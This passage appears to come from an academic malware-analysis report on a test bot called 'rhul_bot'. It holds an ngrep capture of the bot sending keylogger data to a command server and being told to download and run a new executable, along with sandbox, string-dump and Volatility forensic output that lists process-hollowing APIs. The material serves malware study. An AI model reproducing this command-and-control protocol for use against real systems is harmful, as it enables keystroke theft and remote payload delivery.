T 192.168.0.125:1083 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:42]++(Changed+Windows:+Win
91
dows+Explorer)...
#
T 192.168.0.125:1083 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1084 -> 172.16.5.180:80 [A]
FHFIF
#
T 172.16.5.180:80 -> 192.168.0.125:1083 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1083 -> 172.16.5.180:80 [R]
FHFIF
##
T 192.168.0.125:1083 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1084 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:52:10]++(Changed+Windows:+TCP
View+-+Sysinternals:+www.sysinternals.com)...
#
T 192.168.0.125:1084 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1085 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1084 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1084 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1084 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1085 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:52:13]++(Changed+Windows:+)..
.
#
T 192.168.0.125:1085 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1086 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1085 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1085 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1085 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1086 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:52:13]++(Changed+Windows:+Pro
cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)...
#
T 192.168.0.125:1086 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1087 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1086 [AP]
<html>|ack|843|</html>
#
92
T 192.168.0.125:1086 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1086 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1087 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:52:39]++(Changed+Windows:+TCP
View+-+Sysinternals:+www.sysinternals.com)...
#
T 192.168.0.125:1087 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1088 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1087 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1087 -> 172.16.5.180:80 [R]
get /c
#
T 192.168.0.125:1087 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1088 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:53:36]++(Changed+Windows:+Pro
cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)...
#
T 192.168.0.125:1088 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1089 -> 172.16.5.180:80 [A]
get /c
#
T 172.16.5.180:80 -> 192.168.0.125:1088 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1088 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1088 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1089 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:53:43]++(Changed+Windows:+TCP
View+-+Sysinternals:+www.sysinternals.com)...
#
T 192.168.0.125:1089 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1090 -> 172.16.5.180:80 [A]
get /c
#
T 172.16.5.180:80 -> 192.168.0.125:1089 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1089 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1089 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1090 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:53:53]++(Changed+Windows:+Pro
cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)...
#
93
T 192.168.0.125:1090 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1091 -> 172.16.5.180:80 [A]
get /c
#
T 172.16.5.180:80 -> 192.168.0.125:1090 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1090 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1090 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1091 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|OK..
#
T 192.168.0.125:1091 -> 172.16.5.180:80 [AF]
......
##
T 172.16.5.180:80 -> 192.168.0.125:1091 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1091 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1091 -> 172.16.5.180:80 [R]
get /c
###
T 192.168.0.125:1092 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1092 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=idle|843|..
##
T 172.16.5.180:80 -> 192.168.0.125:1092 [AP]
<html>|update|843|http://172.16.5.180/newversion.exe|</html>
##
T 192.168.0.125:1092 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1092 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1093 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1093 -> 172.16.5.180:80 [AP]
GET /newversion.exe HTTP/1.1..User-Agent: InetURL/1.0..Host:
172.16.5.180..
..
##
T 172.16.5.180:80 -> 192.168.0.125:1093 [A]
HTTP/1.1 200 OK..Date: Tue, 25 Jan 2011 15:19:25 GMT..Server:
Apache/2.2.3
(Red Hat)..Last-Modified: Tue, 25 Jan 2011 15:14:33 GMT..ETag: "188ac1-
3a03
3-2c792840"..Accept-Ranges: bytes..Content-Length: 237619..Connection:
clos
e..Content-Type: application/octet-
stream....MZ......................@.....
..........................................!..L.!This program cannot be
run
in DOS
mode....$.......#8.jgY.9gY.9gY.9gY.9aY.9.F.9fY.9.E.9uY.9.F.9?Y.9.F.9
nY.9gY.9.Y.93z.9pY.9RichgY.9........PE..L.....?M...........................
...............@...........................................................
94
..................x........................................................
...........................8................................text...........
.................... ..`.rdata...........
..................@[email protected].
......`[email protected][email protected]
...........
[email protected].........................................
...........................................................................
...........................................................................
...........................................................................
<snip>
...........................................................................
...........................................NB10......?M....C:\vss\rhul_bot\
Debug\rhul_bot.pdb.
#
T 192.168.0.125:1093 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1093 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1094 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1094 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=join|57|steve|..
##
T 172.16.5.180:80 -> 192.168.0.125:1094 [AP]
<html>|ack|57|</html>
##
T 192.168.0.125:1094 -> 172.16.5.180:80 [A]
get /c
#
T 192.168.0.125:1094 -> 172.16.5.180:80 [AF]
......
#ex ^Cexit
2384 received, 0 dropped
sh-3.2# exit
exit
Script done on Tue Jan 25 15:22:54 2011
Figure 46 – Full output of ngrep session
95
From investigation of malware that is known not to be armored
Installation Report: Generated by InCtrl5, version 1.0.0.0
Install program: C:\Documents and Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe
2/3/2011 4:14 AM
Contents
Registry
Disk Contents
Ini Files
Text Files
Registry
Keys ignored: 0
(none)
Values added: 8 HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@C:\WINDOWS\system32\SHELL32.dll,-9319"
Type: REG_SZ Data: Printers and Faxes
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7020" Type: REG_SZ Data: &Search
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7021" Type: REG_SZ Data: &Help and Support
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7023" Type: REG_SZ Data: &Run...
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-12710" Type: REG_SZ Data: &Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-21779" Type: REG_SZ Data: My Pictures
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-21790" Type: REG_SZ Data: My Music
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\WINDOWS\System32\taskmgr.exe"
Type: REG_SZ Data: Windows TaskManager
Values changed: 4 HKEY_CURRENT_USER\SessionInformation "ProgramCount"
Old type: REG_DWORD
96
New type: REG_DWORD Old data: 04, 00, 00, 00 New data: 03, 00, 00, 00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count "HRZR_EHACNGU"
Old type: REG_BINARY New type: REG_BINARY Old data: 05, 00, 00, 00, 3D, 00, 00, 00, 00, A9, 15, BA, 9B,
C3, CB, 01 New data: 05, 00, 00, 00, 3E, 00, 00, 00, 30, CB, CB, D9, 9B,
C3, CB, 01 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count "HRZR_EHACNGU:P:\JVAQBJF\Flfgrz32\gnfxzte.rkr"
Old type: REG_BINARY New type: REG_BINARY Old data: 05, 00, 00, 00, 0F, 00, 00, 00, 00, DC, EC, B4, 9B,
C3, CB, 01 New data: 05, 00, 00, 00, 10, 00, 00, 00, 30, CB, CB, D9, 9B,
C3, CB, 01 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed"
Old type: REG_BINARY New type: REG_BINARY Old data: F5, 23, FF, 6A, A3, 0B, 33, 8D, 8C, 00, CE, 86, 37,
F1, AC, 74, C7, 7E, 63, 10, A2, B1, 72, 0D, B0, C8, 15, A7, F6,
4E, 0E, FD, 96, 71, 24, 8F, DD, 45, E8, A2, C6, C3, B4, 29, 19,
EE, 43, 43, 3F, E0, B6, 0F, 35, F3, F0, 9B, 95, D9, A3, BF, F8,
42, 05, E4, F1, 67, AE, 17, DB, 9F, 94, 35, 74, 34, 09, 91, A1,
18, C6, 5F New data: 94, F9, AF, 87, 72, F0, 32, A0, 91, 4D, 08, 77, 16,
10, AC, 53, D4, D2, 68, 6E, 6B, EC, 40, 8C, 19, 19, 6C, 78, A0,
23, 92, C4, BB, 3C, E3, AD, D5, 43, F7, 14, 59, 5F, 4B, F7, 14,
76, 0B, 58, 2F, D8, 66, 66, 12, 14, A2, 8A, CE, BB, 06, 5C, AA,
49, E2, 7F, 51, 96, 2C, 5A, 41, 62, 74, 2E, DC, 95, 7F, 4D, 8B,
C2, F4, AA To Contents
Disk contents
Drives tracked: 1
c:\
Files changed: 4 c:\Documents and Settings\steve\ntuser.dat.LOG
Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:14 AM Old size: 1,024 bytes New size: 1,024 bytes
c:\WINDOWS\Prefetch\RHUL_BOT.RELEASE.ARMORED.NTCR-14459E08.pf Old date: 2/3/2011 4:10 AM New date: 2/3/2011 4:13 AM Old size: 13,444 bytes New size: 13,010 bytes
c:\WINDOWS\system32\config\software.LOG
97
Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:13 AM Old size: 1,024 bytes New size: 1,024 bytes
c:\WINDOWS\system32\config\system.LOG Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:13 AM Old size: 20,480 bytes New size: 1,024 bytes
To Contents
INI file
Ini files tracked: 4
C:\boot.ini
c:\windows\control.ini
c:\windows\system.ini
c:\windows\win.ini
To Contents
Text file
Text files tracked: 2
c:\windows\system32\autoexec.nt
c:\windows\system32\config.nt
To Contents
InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.
Written by Neil J. Rubenking
First published in PC Magazine, December 5, 2000.
Figure 47 – Full output of Inctrl5
Processes:
PID ParentPID User Path
--------------------------------------------------
1256 1332 STEVE-G4LZVXOU0:steve C:\Documents and
Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe
Ports:
Port PID Type Path
--------------------------------------------------
Explorer Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
IE Dlls:
DLL Path Company Name File Description
98
--------------------------------------------------
No changes Found
Loaded Drivers:
Driver File Company Name Description
--------------------------------------------------
Monitored RegKeys
Registry Key Value
--------------------------------------------------
Kernel31 Api Log
--------------------------------------------------
***** Installing Hooks *****
71ab4401 RegOpenKeyExA
(HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)
71ab4c59 RegOpenKeyExA (Protocol_Catalog9)
71ab457f RegOpenKeyExA (00000007)
71ab4650 RegOpenKeyExA (Catalog_Entries)
71ab4952 RegOpenKeyExA (000000000001)
71ab4952 RegOpenKeyExA (000000000002)
71ab4952 RegOpenKeyExA (000000000003)
71ab4952 RegOpenKeyExA (000000000004)
71ab4952 RegOpenKeyExA (000000000005)
71ab4952 RegOpenKeyExA (000000000006)
71ab4952 RegOpenKeyExA (000000000007)
71ab4952 RegOpenKeyExA (000000000008)
71ab4952 RegOpenKeyExA (000000000009)
71ab4952 RegOpenKeyExA (000000000010)
71ab4952 RegOpenKeyExA (000000000011)
71ab4952 RegOpenKeyExA (000000000012)
71ab1779 WaitForSingleObject(79c,0)
71ab4e6d RegOpenKeyExA (NameSpace_Catalog5)
71ab457f RegOpenKeyExA (00000004)
71ab4797 RegOpenKeyExA (Catalog_Entries)
71ab4efa RegOpenKeyExA (000000000001)
71ab4efa RegOpenKeyExA (000000000002)
71ab4efa RegOpenKeyExA (000000000003)
71ab1779 WaitForSingleObject(794,0)
71aa16bd RegOpenKeyExA
(HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)
71aa157c GlobalAlloc()
77e802f3 ExitThread()
7342e286 GetCommandLineA()
7342ed24 GetVersionExA()
77dd953b GetVersionExA()
5ad78000 GetCurrentProcessId()=1256
5ad78a58 IsDebuggerPresent()
7342f0b9 LoadLibraryA(OLEAUT32.DLL)=77120000
771c7de0 LoadLibraryA(oleaut32.dll)=77120000
7343090f RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)
77dd5f00 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)
73445911 CreateFileA(C:\Documents and
Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe)
7344dc9f ReadFile()
DirwatchData
--------------------------------------------------
WatchDir Initilized OK
Watching C:\DOCUME~1\steve\LOCALS~1\Temp
Watching C:\WINDOWS
Watching C:\Program Files
Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD1DE.tmp
Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD.tmp
Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD.tmp
Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD1DE.tmp
File: rhul_bot.release.armored.ntcrypt.171.exe
Size: 114693 Bytes
MD5: 5CEF7C43361D2B7152E59ED49E629D36
99
Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe
File Properties: CompanyName
FileDescription
FileVersion 0.00.0011
InternalName Res
LegalCopyright
OriginalFilename Res.exe
ProductName
ProductVersion
Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 32Kb in 0 seconds
Urls
--------------------------------------------------
RegKeys
--------------------------------------------------
ExeRefs
--------------------------------------------------
File: rhul_bot.release.armored.ntcrypt.171_dmp.exe_
.exe
Res.exe
Raw Strings:
--------------------------------------------------
File: rhul_bot.release.armored.ntcrypt.171_dmp.exe_
MD5: 61bf0ce111b3f8610d27101c9367dc01
Size: 32770
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichA
.text
`.data .rsrc MSVBVM60.DLL
[QsrKPsn FDss RsaTQs
TQso EDsn PssADs6}Rs
[Qs{ Pss{Rs `Os0XQsaUQs
|Rs? Psn[Ps Ps*-Ps
QsFUDsL|Rs4 UQs-XPs ADstEDs
UQsgWPs PsPOQs [Ps"DDsj
Stub
VB5!
VB6ES.DLL
Sub Main
Stub
mMain
mRunPE
mRC4
Stub
kernel32
CreateProcessA
WriteProcessMemory
RtlMoveMemory
user32
__vbaVarZero
CallWindowProcA
GetProcAddress
LoadLibraryA
VBA6.DLL
__vbaAryDestruct
__vbaErase
__vbaAryMove
__vbaPowerR8
__vbaFreeVarList
100
__vbaInStr
__vbaLenBstr
__vbaFileClose
__vbaFreeVar
__vbaFreeStr
__vbaStrVarMove
__vbaStrCopy
__vbaFreeObjList
__vbaFreeStrList
__vbaHresultCheckObj
__vbaNew2
__vbaStrCat
__vbaStrMove
__vbaFileOpen
__vbaOnError
__vbaVarAdd
__vbaR8Var
__vbaFpI4
__vbaVarIndexLoad
__vbaI4Var
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaAryUnlock
__vbaAryLock
__vbaVarMove
__vbaRedim
__vbaGosubFree
__vbaGosubReturn
__vbaUI1Str
__vbaVarCat
__vbaStrVarVal
__vbaVarDup
__vbaVarVargNofree
__vbaStrI4
__vbaStrToUnicode
__vbaSetSystemError
__vbaStrToAnsi
__vbaGosub
__vbaStrVarCopy
__vbaUbound
__vbaAryConstruct2
__vbaVar2Vec
__vbaStrCmp
=TT@ hTT@ } jPh
=TT@ hTT@ } jXh
=TT@ hTT@ } jPh
=TT@ hTT@ } jXh
h-)@ h'.@ Ph, @
PhT @ ,SVW %,P@
Yf95,P@ 6h$"@ %0P@
5`P@ 9-0P@ [_^]
@SVW 5DP@ =&P@
5(P@ 5&P@ ueVWf
=`P@ 5$P@ =$P@
=&P@ 0SVW ,SVW
hpC@
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaFreeVar
__vbaAryMove
__vbaGosubReturn
__vbaStrVa
rMove
__vbaLenBstr
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
101
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaVarIndexLoad
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
__vbaStrCmp
__vbaAryConstruct2
DllFunctionCall
_adj_fpatan
__vbaRedim
__vbaRecUniToAnsi
_CIsqrt
__vbaExceptHandler
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaUbound
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
__vbaInStr
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
__vbaR8Var
_adj_fdiv_r
__vbaI4Var
__vbaAryLock
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaFpI4
_CIatan
__vbaUI1Str
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaAryUnlock
_CIexp
__vbaFreeStr
CsxP&
1u
Unicode Strings:
---------------------------------------------------------------------------
@*\AD:\Pen Drive\NT Crypter 2 Beta 3\Stub\Project1.vbp
.exe
XXXXX
AAAAA
kernel32
102
RtlMoveMemory
CreateProcessW
ntdll
NtUnmapViewOfSection
VirtualAllocEx
WriteProcessMemory
GetThreadContext
SetThreadContext
ResumeThread
jjjj
@*\AD:\Pen Drive\NT Crypter 2 Beta 3\Stub\Project1.vbp
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
0C0A04B0
Comments
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
0.00.0011
ProductVersion
0.00.0011
InternalName
OriginalFilename
Res.exe
Figure 48 – Full output of SysAnalyzer
Script started on Sat Feb 5 15:27:13 2011
bash-3.2$ pwd
/Users/steve/Downloads
bash-3.2$ cd Volatility-1.3_Beta
bash-3.2$ python volatility ident -f../memory.img
Image Name: ../memory.img
Image Type:
VM Type: nopae
DTB: 0x39000
Datetime: Sat Feb 05 09:50:35 2011
bash-3.2$ bash-3.2$ python volatility pslist -f ../memory.img
Name Pid PPid Thds Hnds Time
System 4 0 52 240 Thu Jan 01 00:00:00 1970
smss.exe 800 4 3 21 Sat Feb 05 16:25:30 2011
csrss.exe 888 800 9 280 Sat Feb 05 16:25:32 2011
winlogon.exe 912 800 17 424 Sat Feb 05 16:25:33 2011
services.exe 956 912 16 273 Sat Feb 05 16:25:33 2011
lsass.exe 968 912 20 314 Sat Feb 05 16:25:33 2011
svchost.exe 1148 956 9 228 Sat Feb 05 16:25:33 2011
svchost.exe 1276 956 65 988 Sat Feb 05 16:25:33 2011
svchost.exe 1568 956 4 82 Sat Feb 05 16:25:34 2011
svchost.exe 1592 956 14 156 Sat Feb 05 16:25:34 2011
spoolsv.exe 1788 956 10 132 Sat Feb 05 16:25:35 2011
acs.exe 1960 956 5 103 Sat Feb 05 16:25:42 2011
explorer.exe 1656 608 11 260 Sat Feb 05 16:33:30 2011
msmsgs.exe 792 1656 3 120 Sat Feb 05 16:33:32 2011
wuauclt.exe 484 1276 5 138 Sat Feb 05 16:34:00 2011
rhul_bot.releas 452 472 1 29 Sat Feb 05 17:24:35 2011
Nigilant32.exe 816 1656 4 99 Sat Feb 05 17:50:13 2011
bash-3.2$ python volatility connections -f ../memory.img
bash-3.2$ bash-3.2$ python volatility dlllist -f ../memory.img
103
************************************************************************
System pid: 4
Unable to read PEB for task.
************************************************************************
smss.exe pid: 800
Command line : \SystemRoot\System32\smss.exe
Base Size Path
0x48580000 0xe000 \SystemRoot\System32\smss.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
************************************************************************
csrss.exe pid: 888
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows
SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16
Base Size Path
0x4a680000 0x4000 \??\C:\WINDOWS\system32\csrss.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x75b40000 0xa000 C:\WINDOWS\system32\CSRSRV.dll
0x75b50000 0xe000 C:\WINDOWS\system32\basesrv.dll
0x75b60000 0x46000 C:\WINDOWS\system32\winsrv.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\KERNEL32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x75e90000 0xa1000 C:\WINDOWS\System32\sxs.dll
************************************************************************
winlogon.exe pid: 912
Command line : winlogon.exe
Base Size Path
0x1000000 0x6e000 \??\C:\WINDOWS\system32\winlogon.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x76cc0000 0x10000 C:\WINDOWS\system32\AUTHZ.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x75940000 0x7000 C:\WINDOWS\system32\NDdeApi.dll
0x75930000 0xa000 C:\WINDOWS\system32\PROFMAP.dll
0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x76bf0000 0xb000 C:\WINDOWS\system32\PSAPI.DLL
0x76bc0000 0xe000 C:\WINDOWS\system32\REGAPI.dll
0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll
0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll
0x76c60000 0x29000 C:\WINDOWS\system32\sfc_os.dll
0x76c30000 0x2b000 C:\WINDOWS\system32\WINTRUST.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll
0x75970000 0xf1000 C:\WINDOWS\system32\MSGINA.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x77340000 0x8b000 C:\WINDOWS\system32\COMCTL32.dll
104
0x1f7b0000 0x31000 C:\WINDOWS\system32\ODBC32.dll
0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x1f850000 0x16000 C:\WINDOWS\system32\odbcint.dll
0x76bd0000 0x1e000 C:\WINDOWS\system32\SHSVCS.dll
0x76bb0000 0x4000 C:\WINDOWS\system32\sfc.dll
0x723d0000 0x1a000 C:\WINDOWS\system32\WINSCARD.DLL
0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll
0x75e90000 0xa1000 C:\WINDOWS\system32\sxs.dll
0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll
0x76600000 0x1b000 C:\WINDOWS\system32\cscdll.dll
0x75950000 0x19000 C:\WINDOWS\system32\WlNotify.dll
0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll
0x73000000 0x23000 C:\WINDOWS\system32\WINSPOOL.DRV
0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll
0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll
0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll
0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\wldap32.dll
0x76620000 0x4e000 C:\WINDOWS\system32\cscui.dll
0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL
0x76ce0000 0x1f000 C:\WINDOWS\system32\NTMARTA.DLL
************************************************************************
services.exe pid: 956
Command line : C:\WINDOWS\system32\services.exe
Base Size Path
0x1000000 0x1b000 C:\WINDOWS\system32\services.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x758e0000 0x4d000 C:\WINDOWS\system32\SCESRV.dll
0x76cc0000 0x10000 C:\WINDOWS\system32\AUTHZ.dll
0x758c0000 0x1c000 C:\WINDOWS\system32\umpnpmgr.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x5f770000 0xe000 C:\WINDOWS\system32\NCObjAPI.DLL
0x76f90000 0x10000 C:\WINDOWS\system32\secur32.dll
0x758a0000 0xf000 C:\WINDOWS\system32\eventlog.dll
0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll
0x76bf0000 0xb000 C:\WINDOWS\system32\PSAPI.DLL
0x76f50000 0x8000 C:\WINDOWS\system32\wtsapi32.dll
0x71c20000 0x4f000 C:\WINDOWS\system32\netapi32.dll
************************************************************************
lsass.exe pid: 968
Command line : UNKNOWN
Base Size Path
0x1000000 0x5000 UNKNOWN
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x74520000 0xa7000 C:\WINDOWS\system32\LSASRV.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x74440000 0x69000 C:\WINDOWS\system32\SAMSRV.dll
105
0x76790000 0xb000 C:\WINDOWS\system32\cryptdll.dll
